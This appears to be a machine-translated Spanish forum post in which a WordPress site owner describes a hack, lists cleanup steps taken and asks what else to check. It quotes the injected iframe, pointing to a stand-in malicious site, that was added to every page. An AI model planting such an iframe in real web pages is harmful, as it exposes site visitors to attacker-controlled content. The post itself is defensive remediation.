<iframe>
en cada página como asi:
<iframe src="http://evilsite.com/go/1"></iframe><!DOCTYPEhtmlPUBLIC"-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
Hice lo siguiente
- actualizado a 3.1.3 a través del sistema integrado de actualización de WordPress
- instaló Exploit Scanner (muchas advertencias críticas sobre archivos inusuales) y AntiVirus (esto se mostró verde y limpio, por lo que lo desinstalé y lo eliminé después de ejecutarlo)
- Se cambió la contraseña de MySQL.
- Se modificaron todas las contraseñas de usuario de WordPress.
- Conectado a través de FTP y descargado todo el sistema de archivos (no es grande, es un host compartido de Linux solo para WordPress)
- Difirió el sistema de archivos contra un ZIP oficial de WordPress 3.1.3 y eliminó o sobrescribió cualquier cosa que no coincidiera.
Estoy bastante seguro de que
- todos los archivos en el disco son archivos oficiales de WordPress 3.1.3
- no hay ningún archivo "extra" en el disco que no sea mi one
/theme
, el complemento Exploit Scanner (que acabo de descargar), la carpeta/uploads
y un puñado de otros archivos esperados. Mi otro complemento, wp-recaptcha, coincide con la actual versión oficial descargada. - También verifiqué el archivo
.htaccess
y nada se ve mal allí
No toqué la base de datos , pero me cuesta pensar que cualquier elemento de la base de datos pueda ser malicioso sin código PHP especial para que funcione.
Mi blog de WordPress parece estar bien y sin piratería ahora (creo), pero ¿hay algo más que deba revisar?